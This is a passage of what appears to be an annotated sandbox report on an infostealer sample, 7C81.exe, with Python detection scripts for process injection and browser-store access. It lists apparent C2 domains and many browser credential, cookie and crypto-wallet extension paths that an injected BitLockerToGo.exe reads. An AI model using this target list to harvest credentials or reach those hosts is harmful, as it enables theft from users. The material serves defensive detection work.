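Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: indexterityszcoxp.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: lariatedzugspd.shop
"""

EVENT_RE = re.compile(r"^Source: (?P<src>.+?) (?P<kind>Memory allocated|Memory written|Memory protected|"
                      r"Thread created|Network Connect): (?P<rest>.*?)(?: Jump to behavior)?$")
MEM_RE = re.compile(r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)(?: protect: (?P<prot>.+?))?"
                    r"(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?(?: value: [0-9A-Fa-f]+)?$")
THREAD_RE = re.compile(r"^(?P<target>.+?) EIP: (?P<eip>[0-9A-Fa-f]+)$")
NET_RE = re.compile(r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) (?P<port>\d+)$")
STRING_RE = re.compile(r"^Source: (?P<proc>[^,]+), \S+ String found in binary or memory: (?P<value>\S+)$")
HOST_RE = re.compile(r"^[a-z0-9][a-z0-9.-]*\.[a-z]{2,}$")
# Assumption: system binaries that should not originate outbound connections by themselves; tune per estate.
SYSTEM_PROCESS_NAMES = {"explorer.exe", "svchost.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_events(text):
    """Turn the report's Source lines into event dicts; lines of other kinds are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ev, rest = {"kind": m["kind"], "src": m["src"]}, m["rest"]
        if ev["kind"].startswith("Memory"):
            d = MEM_RE.match(rest)
            if d:
                ev.update(target=d["target"], base=int(d["base"], 16), prot=d["prot"] or "", magic=d["magic"] or "")
        elif ev["kind"] == "Thread created":
            d = THREAD_RE.match(rest)
            if d:
                ev.update(target=d["target"], eip=int(d["eip"], 16))
        else:
            d = NET_RE.match(rest)
            if d:
                ev.update(ip=d["ip"], port=int(d["port"]))
        if d:
            events.append(ev)
    return events


def verdict(c):
    """Strongest evidence wins, so the order of the checks matters."""
    flipped = c["rw_allocs"] & c["exec_protects"] & c["writes"]   # RW page written, then made executable
    if c["mz_writes"]:
        return "PE image written into target at " + ", ".join(f"0x{b:X}" for b in sorted(c["mz_writes"]))
    if flipped:
        return "shellcode staged: RW allocation written, then flipped executable at " + ", ".join(f"0x{b:X}" for b in sorted(flipped))
    if c["threads"]:
        return "remote thread started at EIP " + ", ".join(f"0x{e:X}" for e in c["threads"])
    if c["exec_allocs"]:
        return "executable memory allocated in target"
    return "cross-process memory access only"


def build_chains(events):
    """Group allocate/write/protect/thread events per (injector, target) pair."""
    chains = defaultdict(lambda: {"rw_allocs": set(), "exec_allocs": set(), "exec_protects": set(),
                                  "writes": set(), "mz_writes": set(), "threads": []})
    for ev in events:
        if ev["kind"] == "Network Connect":
            continue
        c = chains[(ev["src"], ev["target"])]
        if ev["kind"] == "Memory allocated":
            (c["exec_allocs"] if "execute" in ev["prot"] else c["rw_allocs"]).add(ev["base"])
        elif ev["kind"] == "Memory protected" and "execute" in ev["prot"]:
            c["exec_protects"].add(ev["base"])
        elif ev["kind"] == "Memory written":
            c["writes"].add(ev["base"])
            if ev["magic"].upper().startswith("4D5A"):   # "MZ": a whole PE image is being copied in
                c["mz_writes"].add(ev["base"])
        elif ev["kind"] == "Thread created":
            c["threads"].append(ev["eip"])
    for c in chains.values():
        c["verdict"] = verdict(c)
    return dict(chains)


def system_process_connections(events):
    """Outbound connections whose source is a process that should not have any."""
    out = defaultdict(list)
    for ev in events:
        if ev["kind"] == "Network Connect" and basename(ev["src"]).lower() in SYSTEM_PROCESS_NAMES:
            out[ev["src"]].append(f"{ev['ip']}:{ev['port']}")
    return dict(out)


def c2_candidates(text):
    """Hostnames that appear as plain strings in a process dump (the .shop hosts in 7C81.exe above)."""
    found = []
    for line in text.splitlines():
        m = STRING_RE.match(line.strip())
        if m and HOST_RE.match(m["value"]) and m["value"] not in found:
            found.append(m["value"])
    return found


def triage(text):
    events = parse_events(text)
    return {"chains": build_chains(events), "system_network": system_process_connections(events),
            "domains": c2_candidates(text)}


if __name__ == "__main__":
    result = triage(SAMPLE)
    for (src, dst), c in result["chains"].items():
        print(f"{basename(src)} -> {basename(dst)}: {c['verdict']}")
    print("system process egress:", result["system_network"])
    print("C2 candidates:", result["domains"])
```

The "Memory written: PID: 1028" lines are parsed too (the target then reads "PID: 1028"), so a chain keyed by PID shows up next to the one keyed by image path when the sandbox could not resolve the handle; merge them by hand if the PID is known to be explorer.exe.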

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 10.0.7C81.exe.7ff7d4c00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.7C81.exe.7ff7d4c00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.2860245379.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2960028925.00007FF7D5140000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7C81.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\7C81.exe, type: DROPPED
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 320, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333549678.00000000040C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2706624835.0000000002621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096191047.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2096228733.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2333340256.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: BitLockerToGo.exe, 0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
Source: BitLockerToGo.exe, 0000000E.00000003.2985106102.0000000000830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: a%\\ElectronCash.
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Libertyt
Source: BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87A87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $'{0}' is not a valid KeyStore name.
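The File opened lines that follow show BitLockerToGo.exe, the Windows binary 7C81.exe injected into earlier in this report, reading Chrome and Edge Login Data, Network\Cookies, Web Data and History, the Firefox profile's cert9.db, cookies.sqlite, formhistory.sqlite and prefs.js, and a long run of Chrome Local Extension Settings directories (the 32-letter names are extension IDs; the report does not name the extensions and the example below does not guess). The detection rule that falls out of this is simple: only the owning browser has any business opening its own credential and cookie stores. The script below is an added example, not code from the report or the sample: it classifies each opened path by store type and owning browser and flags any other process that touches them. The sample lines are copied from this section, plus one constructed control line for chrome.exe opening its own Login Data; the owner mapping and severity levels are the example's own assumptions.

```python
import re
from collections import Counter, defaultdict

# Sample input: "File opened" lines copied from this report, plus one constructed
# control line (chrome.exe opening its own Login Data) that is not in the report.
SAMPLE = r"""
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
"""

LINE_RE = re.compile(r"^Source: (?P<proc>.+?) File opened: (?P<path>.+?)(?: Jump to behavior)?$")

# Assumption: which browser image owns which profile tree (lower-cased path fragment -> process name).
OWNERS = [("\\google\\chrome\\", "chrome.exe"),
          ("\\microsoft\\edge\\", "msedge.exe"),
          ("\\mozilla\\firefox\\", "firefox.exe")]

# Store types, matched against the lower-cased path. Chrome extension IDs are 32 letters a-p.
CATEGORIES = [
    (re.compile(r"\\login data(?: for account)?$"), "credentials"),
    (re.compile(r"\\(?:network\\cookies|cookies\.sqlite)$"), "cookies"),
    (re.compile(r"\\(?:web data|formhistory\.sqlite)$"), "autofill"),
    (re.compile(r"\\history$"), "history"),
    (re.compile(r"\\(?:cert9\.db|key4\.db|logins\.json)$"), "firefox key/cert store"),
    (re.compile(r"\\prefs\.js$"), "profile config"),
    (re.compile(r"\\local extension settings\\(?P<ext>[a-p]{32})$"), "extension storage"),
]


def classify(path):
    """Return (owning browser or None, store category or None, extension id or None) for a path."""
    low = path.lower()
    owner = next((proc for fragment, proc in OWNERS if fragment in low), None)
    for pattern, category in CATEGORIES:
        m = pattern.search(low)
        if m:
            return owner, category, m.groupdict().get("ext")
    return owner, None, None


def assess(text):
    """Per accessing process: what browser stores it opened and whether it is not the owner."""
    findings = defaultdict(lambda: {"categories": Counter(), "extension_ids": set(),
                                    "owners": set(), "flagged": False})
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        owner, category, ext = classify(m["path"])
        if category is None:            # not a browser secret store, ignore
            continue
        proc = m["proc"].rsplit("\\", 1)[-1].lower()
        f = findings[proc]
        f["categories"][category] += 1
        if owner:
            f["owners"].add(owner)
        if ext:
            f["extension_ids"].add(ext)
        if proc != owner:               # a non-browser (or the wrong browser) touching the store
            f["flagged"] = True
    return dict(findings)


def severity(finding):
    if not finding["flagged"]:
        return "none"
    c = finding["categories"]
    return "high" if (c["credentials"] or c["cookies"]) else "medium"


if __name__ == "__main__":
    for proc, f in assess(SAMPLE).items():
        print(f"{proc}: severity={severity(f)} owners={sorted(f['owners'])} "
              f"stores={dict(f['categories'])} extensions={len(f['extension_ids'])}")
```

On a live host the same rule maps onto Sysmon FileCreate/FileCreateStreamHash or EDR file-open telemetry keyed on the Login Data, Cookies, cert9.db and key4.db names; the reason the sandbox attributes these opens to BitLockerToGo.exe rather than to 7C81.exe is the PE injection shown in the previous section, so any allow-list must be on the injected image's real parent chain, not on the image name.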
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
